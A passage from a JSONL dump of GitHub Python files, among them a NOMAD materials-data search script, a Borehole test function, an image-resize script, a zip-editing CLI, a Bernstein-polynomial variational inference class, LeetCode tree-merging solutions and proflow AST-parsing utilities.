'Element_2']).response().result # You can add more elements and same on line 18\n# print the total amount of search results\ntotal_results=data.pagination.total\npages=int(total_results/50)+1\nprint(total_results)\n# print the data of the first result\n#get_data_check=https://nomad-lab.eu/prod/rae/api/raw/calc/kp7507aMQFKDGPgVTg7GWQ/P8x0nSIuDOUI1bDfF9XroPPi-gP6/vasprun.xml.relax2 -o download.zip\n#url_to_know=https://nomad-lab.eu/prod/rae/api/raw/calc/upload_id/calc_id/vasprun.xml.relax2?length=16384&decompress=true\n#next_test_url=http://nomad-lab.eu/prod/rae/api/raw/query?upload_id=kp7507aMQFKDGPgVTg7GWQ -o download.zip\nnomad_data=[]\nfor j in range(pages):\n\tdata = client.repo.search(only_atoms=['Element_1','Element_2'],page=j+1,per_page=50).response().result\n#\tclient.raw.get(upload_id=calc['upload_id'], path=calc['mainfile']).response()\n\tdata_size=len(data.results)\n\tfor i in range(data_size):\n\t\tprint(data.results[i]['mainfile'])\n\t\tm=re.search(r'vasprun.*',data.results[i]['mainfile'])\n\t\tif m is 
None:\n\t\t\tprint(\"Nothing\")\n\t\telse:\n\t\t\tprint(m.group(0))\n\t\t\tvasprun_string=m.group(0)\n\t\t\tdata_fetch=\"https://nomad-lab.eu/prod/rae/api/raw/calc/\"+data.results[i]['upload_id']+\"/\"+data.results[i]['calc_id']+\"/\"+vasprun_string\n\t\t\tnomad_data.append([data.results[i]['formula'],data.results[i]['upload_id'],data.results[i]['calc_id'],vasprun_string,data_fetch])\nwith open(\"DownloadFiles.txt\",\"w\") as file:\n\tfor i in range(len(nomad_data)):\n\t\tfile.write(nomad_data[i][0])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][1])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][2])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][3])\n\t\tfile.write(\"\\t\")\n\t\tfile.write(nomad_data[i][4])\n\t\tfile.write(\"\\n\")\nfile.close()\n","repo_name":"bikashtimalsina/nomad-data-client","sub_path":"nomad-data.py","file_name":"nomad-data.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21182064101","text":"import numpy as np\nimport numpy.typing as npt\n\nbounds = np.array(\n [\n [63070, 115600],\n [63.1, 116],\n [990, 1110],\n [700, 820],\n [0, np.inf], # Not sure if the physics have a more meaningful upper bound\n [0.05, 0.15], # Very low probability of being outside of this range\n [9855, 12045],\n [1120, 1680],\n ]\n)\n\n\ndef borehole(H, persis_info, sim_specs, _):\n \"\"\"\n Wraps the borehole function\n \"\"\"\n H_o = np.zeros(H[\"x\"].shape[0], dtype=sim_specs[\"out\"])\n H_o[\"f\"] = borehole_func(H[\"x\"])\n\n return H_o, persis_info\n\n\ndef borehole_func(x: npt.NDArray):\n \"\"\"This evaluates the Borehole function for n-by-8 input\n matrix x, and returns the flow rate through the Borehole. (Harper and Gupta, 1983)\n input:\n\n Parameters\n ----------\n\n x: numpy.typing.NDArray\n\n .. 
code-block::\n\n x[:,0]: Tu, transmissivity of upper aquifer (m^2/year)\n x[:,1]: Tl, transmissivity of lower aquifer (m^2/year)\n x[:,2]: Hu, potentiometric head of upper aquifer (m)\n x[:,3]: Hl, potentiometric head of lower aquifer (m)\n x[:,4]: r, radius of influence (m)\n x[:,5]: rw, radius of borehole (m)\n x[:,6]: Kw, hydraulic conductivity of borehole (m/year)\n x[:,7]: L, length of borehole (m)\n\n Returns\n -------\n\n f: numpy.ndarray\n vector of dimension (n, 1): flow rate through the Borehole (m^3/year)\n\n \"\"\"\n\n assert np.all(x >= bounds[:, 0]) and np.all(x <= bounds[:, 1]), \"Point not within bounds\"\n\n axis = 1\n if x.ndim == 1:\n axis = 0\n\n (Tu, Tl, Hu, Hl, r, rw, Kw, L) = np.split(x, 8, axis)\n\n numer = 2 * np.pi * Tu * (Hu - Hl)\n denom1 = 2 * L * Tu / (np.log(r / rw) * rw**2 * Kw)\n denom2 = Tu / Tl\n\n return ((numer / (np.log(r / rw) * (1 + denom1 + denom2))).reshape(-1))[0]\n\n\ndef gen_borehole_input(n):\n \"\"\"Generates and returns n inputs for the Borehole function, according to distributions\n outlined in Harper and Gupta (1983).\n\n input:\n n: number of input to generate\n output:\n matrix of (n, 8), input to borehole_func(x) function\n \"\"\"\n\n Tu = np.random.uniform(63070, 115600, n)\n Tl = np.random.uniform(63.1, 116, n)\n Hu = np.random.uniform(990, 1110, n)\n Hl = np.random.uniform(700, 820, n)\n r = np.random.lognormal(7.71, 1.0056, n)\n rw = np.random.normal(0.1, 0.0161812, n)\n Kw = np.random.uniform(9855, 12045, n)\n L = np.random.uniform(1120, 1680, n)\n\n x = np.column_stack((Tu, Tl, Hu, Hl, r, rw, Kw, L))\n return x\n","repo_name":"Libensemble/libensemble","sub_path":"libensemble/sim_funcs/borehole.py","file_name":"borehole.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"38003075171","text":"import os\nfrom glob import glob\nfrom PIL import Image\n\nrd = \"/data/IVC_180814/IVC_Filter_Images/test/\"\nbd = \"/home/mihan/projects/ivc_nocrop/src/gradcam.pytorch/3_detector/results_kfold0.25/heatmaps\"\nod = \"/home/mihan/projects/ivc_nocrop/src/gradcam.pytorch/3_detector/results_kfold0.25/heatmaps_origsize\"\n\ndirs = sorted([os.path.abspath(x) for x in glob(\"%s/*\" %bd)])\nfiles = sorted([os.path.abspath(x) for x in glob(\"%s/*/*\" %bd)])\n\nfor d in dirs:\n nd = od + d.split('heatmaps')[1]\n if not os.path.exists(nd): os.makedirs(nd)\n\nfor f in files:\n img = Image.open(f)\n img_orig = Image.open('%s/%s' %(rd, os.path.basename(f)))\n dim_orig = img_orig.size\n print(f.split('heatmaps')[1], img.size, dim_orig)\n \n outfile = od + f.split('heatmaps')[1]\n img = img.resize((dim_orig[0], dim_orig[1]), Image.ANTIALIAS)\n img.save(outfile)\n","repo_name":"michellehan/ivc_nocrop","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22938009937","text":"import tempfile\nimport click, zipfile, pathlib\nimport os\nimport tempfile\nfrom datetime import date\n\n@click.command()\n@click.option('--zipname', '-zn', help=\"Zip file name\", required=True, prompt=\"Zip file name please\")\n@click.option('--data', '-d', help=\"Example data\", required=True, prompt=\"Example text for VERSION.txt file please\")\n@click.option('--value', '-v', help=\"Update the date in updated.txt file\", required=True, prompt=\"Updated the date? 
Yes - 1, No - 2\")\ndef supercli(zipname, data, value):\n    path = str(pathlib.Path().resolve()) + '\\\\' + zipname + \".zip\"\n    try:\n        zipfile.ZipFile(path, 'r')\n    except FileNotFoundError:\n        print(\"Wrong file name.\")\n        return\n    except zipfile.BadZipFile:\n        print(\"The file is corrupted.\")\n        return\n    \n    tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))\n    os.close(tmpfd)\n\n    zipname = zipname + '.zip'\n    with zipfile.ZipFile(zipname, 'r') as zin:\n        with zipfile.ZipFile(tmpname, 'w') as zout:\n            for item in zin.infolist():\n                if str(value) != '1' and item.filename != 'VERSION.txt':\n                    # copy the existing entry across unchanged\n                    zout.writestr(item, zin.read(item.filename))\n\n    os.remove(zipname)\n    os.rename(tmpname, zipname)\n\n    with zipfile.ZipFile(zipname, mode='a', compression=zipfile.ZIP_DEFLATED) as zf:\n        files = 0\n        for file in zf.infolist():\n            files = files + 1\n        if files == 0:\n            zf.writestr('VERSION.txt', data)\n            if str(value) == '1':\n                zf.writestr('updated.txt', str(date.today()))\n        else:\n            if str(value) == '1':\n                zf.writestr('VERSION.txt', data)\n                zf.writestr('updated.txt', str(date.today()))\n            else:\n                zf.writestr('VERSION.txt', data)\n","repo_name":"adm108/simpleCLI","sub_path":"supercli.py","file_name":"supercli.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15718001517","text":"import logging\n\nfrom bots import imps\nfrom openbb_terminal.decorators import log_start_end\n\nlogger = logging.getLogger(__name__)\n\n\n@log_start_end(log=logger)\ndef quote_command(ticker: str = None):\n    \"\"\"Ticker Quote\"\"\"\n\n    # Debug\n    if imps.DEBUG:\n        logger.debug(\"quote %s\", ticker)\n\n    # Check for argument\n    if ticker is None:\n        raise Exception(\"Stock ticker is required\")\n\n    df = imps.quote(ticker)\n    fig = imps.plot_df(\n        df,\n        fig_size=(600, 1500),\n        col_width=[2, 3],\n        tbl_header=imps.PLT_TBL_HEADER,\n        tbl_cells=imps.PLT_TBL_CELLS,\n        font=imps.PLT_TBL_FONT,\n        row_fill_color=imps.PLT_TBL_ROW_COLORS,\n        paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n    )\n    fig.update_traces(cells=(dict(align=\"left\")))\n    imagefile = imps.save_image(\"quote.png\", fig)\n\n    return {\n        \"title\": f\"{ticker.upper()} Quote\",\n        \"imagefile\": imagefile,\n    }\n","repo_name":"rohankumardubey/OpenBBTerminal","sub_path":"bots/stocks/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36510369965","text":"import numpy as np\nimport tensorflow as tf\nimport tensorflow_probability as tfp\ntfd=tfp.distributions\n\n\n\ndef init_beta_dist(M):\n    in1 = []\n    in2 = []\n    for i in range(1,M+1):\n        in1.append(i)\n        in2.append(M-i+1)\n\n    return tfd.Beta(in1,in2)\n    \ndef init_beta_dist_dash(M):\n    M=M-1\n    in1 = []\n    in2 = []\n    for i in range(1,M+1):\n        in1.append(i)\n        in2.append(M-i+1)\n\n    return tfd.Beta(in1,in2)\n\ndef eval_h_MLT(z,theta,beta_dist):\n    if (z.shape==()):\n        zI=z\n        fIm=beta_dist.prob(zI)\n        return tf.math.reduce_mean(fIm*theta) \n    else:\n        zI=tf.reshape(z,[-1,1])\n        zI=tf.cast(zI, tf.float32)\n        fIm=beta_dist.prob(zI)\n        return tf.math.reduce_mean(fIm*theta,axis=1) \n\ndef eval_h_MLT_dash(z, theta, beta_dist_dash):\n    len_koeff=theta.shape[0]\n    zI=tf.reshape(z,[-1,1])\n    zI=tf.cast(zI, tf.float32)\n\n    by=beta_dist_dash.prob(zI)\n    d_Theta=theta[1:len_koeff]-theta[0:(len_koeff-1)]\n\n    bern_dash=tf.reduce_sum(by*d_Theta,axis=1)\n    return bern_dash\n\ndef h_z2w(z, a, b, theta, alpha, beta, beta_dist):\n    z_tilde=a*z-b\n    
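# transformation chain: affine (a, b) -> sigmoid into (0, 1) -> monotone Bernstein polynomial h_MLT -> affine (alpha, beta)\n    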
z_sig=tf.math.sigmoid(z_tilde)\n h_MLT=eval_h_MLT(z=z_sig, theta=theta, beta_dist=beta_dist)\n w=alpha*h_MLT-beta\n return w\n\ndef h_w2z_black_box_inverse(w_to_inverse, a, b, theta, alpha, beta, beta_dist):\n z_optimized = tf.Variable(0.)\n\n a_not_trainable=a.numpy()\n b_not_trainable=b.numpy()\n theta_not_trainable=theta.numpy()\n alpha_not_trainable=alpha.numpy()\n beta_not_trainable=beta.numpy()\n\n loss_fn = lambda: (h_z2w(z=z_optimized,a=a_not_trainable,b=b_not_trainable,theta=theta_not_trainable,alpha=alpha_not_trainable,beta=beta_not_trainable,beta_dist=beta_dist) - w_to_inverse )**2\n tfp.math.minimize(loss_fn,\n num_steps=30, \n optimizer=tf.optimizers.Adam(learning_rate=0.1))\n return z_optimized\n\ndef h_w2z_fake_inverse_taylor(w_to_inverse, a, b, theta, alpha, beta, beta_dist, beta_dist_dash):\n m_plus_1=theta.shape[0]\n\n z=h_w2z_black_box_inverse(w_to_inverse=w_to_inverse,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n\n z_tilde=a*z-b\n z_sig=tf.math.sigmoid(z_tilde)\n\n taylor0=beta_dist.prob(z_sig)\n taylor1=theta.shape[0]*(0-beta_dist_dash.prob(z_sig)[0:1])\n for i in range(theta.shape[0]-2):\n taylor1=tf.concat((taylor1,(theta.shape[0]*(beta_dist_dash.prob(z_sig)[i:i+1]-beta_dist_dash.prob(z_sig)[i+1:i+2]))),axis=0)\n taylor1=tf.concat((taylor1,(theta.shape[0]*(beta_dist_dash.prob(z_sig)[theta.shape[0]-2:theta.shape[0]-1]))),axis=0)\n\n z_sig_fake=(((w_to_inverse+beta)/alpha)*m_plus_1-tf.reduce_sum(taylor0*theta))/tf.reduce_sum(taylor1*theta)+z_sig\n\n arg_log=1/z_sig_fake-1\n z_fake=(-tf.math.log(arg_log)+b)/a\n\n return z_fake\n\n# Method using derivation\ndef eval_variational_dist(z, a, b, theta, alpha, beta, beta_dist):\n fz=tfd.Normal(loc=0,scale=1).prob(z)\n with tf.GradientTape() as tape:\n tape.watch([z])\n w=h_z2w(z=z,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n dw_dz = tape.gradient(w, z)\n h_w2z_dash = 1.0 / dw_dz\n q=fz*tf.math.abs(h_w2z_dash)\n return q,w\n\n# Method using epsilon\ndef eval_variational_dist_epsilon(z, z_epsilon, a, b, theta, alpha, beta, beta_dist):\n fz=tfd.Normal(loc=0,scale=1).prob(z)\n w=h_z2w(z=z,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n w_epsilon=h_z2w(z=z_epsilon,a=a,b=b,theta=theta,alpha=alpha,beta=beta,beta_dist=beta_dist)\n h_w2z_dash=(z_epsilon-z)/(w_epsilon-w)\n q=fz*tf.math.abs(h_w2z_dash)\n return q,w \n\ndef to_a(a_tunable):\n return tf.math.softplus(a_tunable[0:1])\n\ndef to_theta(theta_tunable):\n theta=theta_tunable[0:1]\n for i in range(np.shape(theta_tunable)[0]-1):\n theta=tf.concat((theta,(theta[i:i+1]+tf.math.softplus(theta_tunable[i+1:i+2]))),axis=0)\n return theta\n\ndef to_alpha(alpha_tunable):\n return tf.math.softplus(alpha_tunable[0:1])\n\n\n\n\n\n\nclass VIMLTS:\n def __init__(self, m, using_epsilon=False, epsilon=tf.constant(0.001)):\n self.m=m\n self.num_params=self.m+4\n self.beta_dist=init_beta_dist(self.m)\n self.beta_dist_dash=init_beta_dist_dash(self.m)\n self.using_epsilon=using_epsilon\n self.epsilon=epsilon\n \n def update_lambda_param(self, lambda_update):\n self.a_tilde=lambda_update[0:1]\n self.b=lambda_update[1:2]\n self.theta_delta=lambda_update[2:self.num_params-2]\n self.alpha_tilde=lambda_update[self.num_params-2:self.num_params-1]\n self.beta=lambda_update[self.num_params-1:self.num_params]\n\n def get_target_dist(self, num=1000):\n zz=tf.Variable(np.linspace(-6,6,num),dtype='float32')\n if self.using_epsilon:\n z_epsilon=tf.Variable(zz+self.epsilon)\n 
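# approximate the Jacobian dz/dw with a finite difference between z and z + epsilon\n            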
q_dist,ww=eval_variational_dist_epsilon(z=zz,z_epsilon=z_epsilon,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n        else:\n            q_dist,ww=eval_variational_dist(z=zz,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n        return q_dist,ww\n\n    def get_target_dist_for_z(self,z):\n        if self.using_epsilon:\n            z_epsilon=tf.Variable(z+self.epsilon)\n            q_dist,ww=eval_variational_dist_epsilon(z=z,z_epsilon=z_epsilon,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n        else:\n            q_dist,ww=eval_variational_dist(z=z,a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n\n        return q_dist, ww\n\n    def get_sample_w(self):\n        z_sample = tfd.Normal(loc=0., scale=1.).sample()\n        return z_sample,h_z2w(z=z_sample, a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n\n    def get_h_mlt(self,overValues):\n        return eval_h_MLT(z=overValues,theta=to_theta(self.theta_delta),beta_dist=self.beta_dist)\n\n    def get_h_mlt_dash(self,overValues):\n        return eval_h_MLT_dash(z=overValues,theta=to_theta(self.theta_delta),beta_dist_dash=self.beta_dist_dash)\n\n    ##################################################### Debug functions ####################################################\n    def get_beta(self,x):\n        return self.beta_dist.prob(x)\n\n    def get_beta_dash(self,x):\n        return self.beta_dist_dash.prob(x)\n\n    def get_param(self):\n        param_array=to_a(self.a_tilde).numpy()\n        param_array=np.concatenate((param_array,self.b.numpy()),axis=0)\n        param_array=np.concatenate((param_array,to_theta(self.theta_delta).numpy()),axis=0)\n        param_array=np.concatenate((param_array,to_alpha(self.alpha_tilde).numpy()),axis=0)\n        param_array=np.concatenate((param_array,self.beta.numpy()),axis=0)\n        return param_array\n\n    def test_transformation(self,w_test):\n        z_test=h_w2z_fake_inverse_taylor(w_to_inverse=w_test, a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist, beta_dist_dash=self.beta_dist_dash)\n        print(\"ztest:\",z_test)\n        return h_z2w(z=z_test, a=to_a(self.a_tilde), b=self.b, theta=to_theta(self.theta_delta), alpha=to_alpha(self.alpha_tilde), beta=self.beta, beta_dist=self.beta_dist)\n    \n    def print_param(self):\n        print(\"self.num_params:\\t\",self.num_params)\n        print(\"self.a_tilde:\\t\\t\",self.a_tilde.numpy())\n        print(\"a:\\t\\t\\t\",to_a(self.a_tilde).numpy())\n        print(\"self.b:\\t\\t\\t\",self.b.numpy())\n        print(\"self.theta_delta:\\t\",self.theta_delta.numpy())\n        print(\"theta:\\t\\t\\t\",to_theta(self.theta_delta).numpy())\n        print(\"self.alpha_tilde:\\t\",self.alpha_tilde.numpy())\n        print(\"alpha:\\t\\t\\t\",to_alpha(self.alpha_tilde).numpy())\n        print(\"self.beta:\\t\\t\",self.beta.numpy())\n","repo_name":"stefan1893/VIMLTS","sub_path":"src/vimlts.py","file_name":"vimlts.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18008824433","text":"'''\nGiven two binary trees, imagine that when you overlay one of them onto the other, some nodes of the two trees will overlap.\nYou need to merge them into a new binary tree. The merge rule: if two nodes overlap, their values are summed to become the new value of the merged node; otherwise the non-NULL node is used directly as the node of the new tree.\n\nExample 1:\nInput:\n\tTree 1 Tree 2\n 1 2\n / \\ / \\\n 3 2 1 3\n 
/ \\ \\\n 5 4 7\nOutput:\nMerged tree:\n\t 3\n\t / \\\n\t 4 5\n\t / \\ \\\n\t 5 4 7\nNote: the merge must start from the root nodes of both trees.\n'''\n\n# Recursive implementation\nclass Solution(object):\n\tdef mergeTrees(self, t1, t2):\n\t\t\"\"\"\n\t\t:type t1: TreeNode\n\t\t:type t2: TreeNode\n\t\t:rtype: TreeNode\n\t\t\"\"\"\n\t\tdef dfs(r1,r2):\n\t\t\t# If either r1 or r2 is null, just return the other one\n\t\t\tif not (r1 and r2):\n\t\t\t\treturn r1 if r1 else r2\n\t\t\t# Set r1's value to the sum of r1's and r2's values,\n\t\t\t# then recursively merge the left and right children of both trees\n\t\t\tr1.val += r2.val\n\t\t\tr1.left = dfs(r1.left,r2.left)\n\t\t\tr1.right = dfs(r1.right,r2.right)\n\t\t\treturn r1\n\t\treturn dfs(t1,t2)\n\n# Iterative implementation\nclass Solution(object):\n\tdef mergeTrees(self, t1, t2):\n\t\t\"\"\"\n\t\t:type t1: TreeNode\n\t\t:type t2: TreeNode\n\t\t:rtype: TreeNode\n\t\t\"\"\"\n\t# If either t1 or t2 is null, just return the other one\n\t\tif not (t1 and t2):\n\t\t\treturn t2 if not t1 else t1\n\t\tqueue = [(t1,t2)]\n\t\twhile queue:\n\t\t\tr1,r2 = queue.pop(0)\n\t\t\tr1.val += r2.val\n\t\t\t# If both left subtrees are non-empty, push the pair onto the queue\n\t\t\t# If r1's left subtree is empty, attach r2's left subtree to r1\n\t\t\tif r1.left and r2.left:\n\t\t\t\tqueue.append((r1.left,r2.left))\n\t\t\telif not r1.left:\n\t\t\t\tr1.left = r2.left\n\t\t\t# The right subtrees are handled the same way\n\t\t\tif r1.right and r2.right:\n\t\t\t\tqueue.append((r1.right,r2.right))\n\t\t\telif not r1.right:\n\t\t\t\tr1.right = r2.right\n\t\treturn t1","repo_name":"Chancey-Peng/CodePractice","sub_path":"Simple/617. 合并二叉树.py","file_name":"617. 合并二叉树.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15941056311","text":"from collections import namedtuple\nfrom typing import List, Tuple, TYPE_CHECKING, Callable, Union, Dict\nimport inspect\nimport re\nimport warnings\nimport ast\nimport textwrap\n\nfrom proflow.Objects.Interface import I\n\nif TYPE_CHECKING:\n    from proflow.Objects.Process import Process\n\nNEXT_ID = -1\nMAX_AST_DUMP_LENGTH = 1000\n\n\ndef get_id():\n    global NEXT_ID\n    NEXT_ID += 1\n    return NEXT_ID\n\n\ndef reset_id():\n    global NEXT_ID\n    NEXT_ID = -1\n\n\nclass ProflowParsingError(Exception):\n    def __init__(self, message, process: \"Process\"):\n        self.message = message\n        self.process = process\n        # self.source = inspect.getsource(process)\n        self.full_message = f\"\"\"Failed to parse the Proflow Process: \\n\nProcess name: {process.comment or process.func.__name__} \\n\nMessage: \"{message}\"\n    \"\"\"\n        super().__init__(self.full_message)\n\n\nclass ProflowParsingFunctionError(Exception):\n    def __init__(self, message, func):\n        self.message = message\n        self.source = inspect.getsource(func)\n        try:\n            source_code = textwrap.dedent(inspect.getsource(func))\n            ast_tree = ast.parse(source_code)\n            ast_dump = ast.dump(ast_tree)\n        except Exception:\n            ast_dump = \"Failed to dump ast!\"\n\n        self.full_message = f\"\"\"Proflow parsing function error: {self.message}\n    {self.source}\n    AST:\n    {ast_dump}\n\"\"\"\n        super().__init__(self.full_message)\n\n    def __repr__(self):\n        return f'Proflow parsing function error: {self.message} \\n {self.source}'\n\n\nclass ProflowParsingLineError(Exception):\n    def __init__(self, message, failed_line: str):\n        self.message = message\n        self.source = failed_line\n        super().__init__(self.message)\n\n    def __repr__(self):\n        return f'Proflow parsing line error: {self.message} \\n {self.source}'\n\n\nclass ProflowParsingAstError(Exception):\n    def __init__(self, message, failed_ast):\n        ast_dump = ast.dump(failed_ast)[0:MAX_AST_DUMP_LENGTH]\n        message = f'{message} \\n ======= ast.dump: \\n {ast_dump} \\n ==='\n        self.message = message\n        self.ast = 
failed_ast\n super().__init__(self.message)\n\n def __repr__(self):\n return f'Proflow parsing line error: {self.message}'\n\n\n#: Mapping of argument to the value\nArgMap = Dict[str, str]\n\n\ndef strip_out_comments(string: str) -> str:\n r = re.compile(r'#.*?$', re.MULTILINE)\n return r.sub('', string)\n\n\ndef extract_output_lines(map_inputs_fn: Callable[[object], List[str]]) -> List[str]:\n outputs_source = None\n try:\n outputs_source = strip_out_comments(inspect.getsource(map_inputs_fn))\n if outputs_source[0:len(\"def GET_INPUT_FACTORY_INNER\")] == \"def GET_INPUT_FACTORY_INNER\":\n return []\n\n r_list = re.compile(r'lambda result.*?:.*?\\[(?P.*)\\]', re.DOTALL | re.MULTILINE)\n output_map_raw = r_list.search(outputs_source).groups()[0]\n # Get lines\n r = re.compile(r'(?: |\\[|^)\\((.*?)\\)(?:,|$)$', re.DOTALL | re.MULTILINE)\n matches = r.finditer(output_map_raw)\n lines = (g for match in matches if match is not None for g in match.groups())\n return lines\n except AttributeError as error:\n warnings.warn(Warning(f\"\"\"Failed to parse output lines\n\nError\n=====\n{error}\n\nSource\n======\n{outputs_source}\n\n \"\"\"))\n return []\n\n\ndef remove_inverted_commas_from_arg(arg: str) -> str:\n \"\"\"Remove surrounding '' from string.\"\"\"\n if arg[0] == \"'\" and arg[-1] == \"'\":\n return arg[1:-1]\n else:\n return arg\n\n\ndef parse_key(k: str) -> str:\n \"\"\"Convert a input key to dot notation.\n\n Parameters\n ----------\n k : str\n example: config.a.foo[0][var]\n\n Returns\n -------\n str\n example: config.a.foo.0.[var]\n \"\"\"\n\n def replace_var_fn(x):\n if x.groups()[0] is not None:\n return f'.{x.groups()[0]}.'\n elif x.groups()[1] is not None:\n return f'.{x.groups()[1]}.'\n elif x.groups()[2] is not None:\n return f'.[{x.groups()[2]}].'\n else:\n return 'zzz'\n # step 1. 
Find state or config\n find_square_brackets = r'\\[(\\d*?)\\]|\\[\\'(\\D*?)\\'\\]|\\[(\\D*?)\\]'\n r = re.compile(find_square_brackets, re.DOTALL)\n # print(list(r.finditer(k)))\n replaced_parts = re.sub(r, replace_var_fn, k)\n replaced_double_dots = re.sub(r'\\.\\.+', '.', replaced_parts)\n out = re.sub(r'^\\'|\\'$|\\.$|^\\.|\\.\\'$', '', replaced_double_dots)\n return out\n\n\ndef rm_inv_comma(string: str):\n return re.sub('^\\'|\\'$', '', string)\n\n\ndef parse_inputs_to_interface(\n process_inputs: Callable[[any], List[I]],\n allow_errors=True,\n) -> List[I]:\n try:\n inputs_map = parse_inputs(process_inputs)\n input_objects = [I(v, as_=k) for k, v in inputs_map.items()]\n except ProflowParsingLineError as e:\n # warnings.warn(Warning(e.message))\n # warnings.warn(Warning(e.source))\n if not allow_errors:\n raise e from e\n return [I(from_='UNKNOWN', as_='UNKNOWN')]\n except TypeError:\n # warnings.warn(Warning(e))\n return [I(from_='ERROR', as_='ERROR')]\n return input_objects\n\n\ndef parse_output_line(output_line: str) -> List[str]:\n output_args = output_line.split(',')\n if len(output_args) != 2:\n raise ProflowParsingLineError('Failed to parse output line', output_line)\n return output_args\n\n\ndef parse_outputs_to_interface(\n process_outputs: Callable[[any], List[I]],\n allow_errors=True,\n) -> List[I]:\n output_lines_row = None\n try:\n parse_outputs_b(process_outputs)\n output_lines_row = extract_output_lines(process_outputs)\n args_and_kwargs = [parse_output_line(line) for line in output_lines_row]\n output_objects = [\n I(from_=args[0], as_=f'state.{rm_inv_comma(args[1].strip())}')\n for args in args_and_kwargs]\n return output_objects\n except ProflowParsingLineError as e:\n # warnings.warn(Warning(e.message))\n # warnings.warn(Warning(e.source))\n if not allow_errors:\n raise e from e\n return [I(from_='UNKNOWN', as_='UNKNOWN')]\n except ProflowParsingAstError as e:\n # warnings.warn(Warning(e.message))\n # warnings.warn(Warning(e.ast))\n if not allow_errors:\n raise e from e\n return [I(from_='UNKNOWN', as_='UNKNOWN')]\n\n\ndef get_inputs_list_from_lambda_fn(input_tree: ast.Assign) -> ast.List:\n if isinstance(input_tree.value, ast.Tuple):\n return input_tree.value.elts[0].body\n elif isinstance(input_tree.value, ast.Lambda):\n return input_tree.value.body\n else:\n raise ProflowParsingAstError(\n f\"Unexpected AST type: {type(input_tree.value)}\", input_tree)\n\n\ndef get_inputs_list_from_function_def(input_tree: ast.FunctionDef) -> ast.List:\n try:\n return input_tree.body[0].value\n except Exception as e:\n warnings.warn(Warning(e))\n raise ProflowParsingAstError(\n f\"Failed to get Process inputs from function: {ast.dump(input_tree)}\", input_tree)\n\n\ndef get_inputs_list(input_tree: Union[ast.Assign, ast.FunctionDef]) -> ast.List:\n if isinstance(input_tree, ast.Assign):\n return get_inputs_list_from_lambda_fn(input_tree)\n elif isinstance(input_tree, ast.FunctionDef):\n return get_inputs_list_from_function_def(input_tree)\n else:\n raise ProflowParsingAstError(\n f\"Unexpected AST type: {type(input_tree)}\", input_tree)\n\n\ndef parse_unary_op(v: ast.UnaryOp):\n if isinstance(v.op, ast.USub):\n arg, argMap = parse_arg_val(v.operand)\n return [\"-\" + str(arg), argMap]\n else:\n raise ProflowParsingAstError(f\"AST UnaryOp type not implemented: {type(v.op)}\", v)\n\n\ndef parse_bin_op(attr: ast.BinOp):\n additional_args = {}\n arg_list = []\n parsed_arg_left, _additional_args = parse_arg(attr.left)\n additional_args = {**additional_args, **_additional_args}\n 
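# the right operand is parsed the same way, and its extra argument mappings are merged in\n    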
parsed_arg_right, _additional_args = parse_arg(attr.right)\n additional_args = {**additional_args, **_additional_args}\n lhs = '.'.join(map(str, reversed(parsed_arg_left)))\n rhs = '.'.join(map(str, reversed(parsed_arg_right)))\n # TODO: Should we include op here?\n arg_list.append(f\"{lhs},{rhs}\")\n return arg_list, additional_args\n\n\ndef parse_arg_val(v: ast.Index) -> Tuple[str, ArgMap]:\n \"\"\"Parse a argument.\n\n Parameters\n ----------\n v : _type_\n _description_\n\n Returns\n -------\n str\n _description_\n\n Raises\n ------\n ProflowParsingAstError\n _description_\n \"\"\"\n if isinstance(v, ast.UnaryOp):\n return parse_unary_op(v)\n elif isinstance(v, ast.Name):\n return [v.id, {}]\n elif isinstance(v, ast.Constant):\n return [v.value, {}]\n elif isinstance(v, ast.BinOp):\n return parse_bin_op(v)\n elif isinstance(v, ast.Attribute):\n # If index is a attribute then we need to also store the mapping of\n # the variable to the index\n parsed_arg, argmap = parse_arg(v)\n in_args = \".\".join(list(reversed(parsed_arg)))\n refKey = \"*X\" # TODO: Randomly generate this so no clashes\n argmap[refKey] = in_args\n # return f\"*{v.value.id}.{v.attr}\"\n # raise Exception(\"STOP\")\n return [\"*X\", argmap]\n # return out\n else:\n 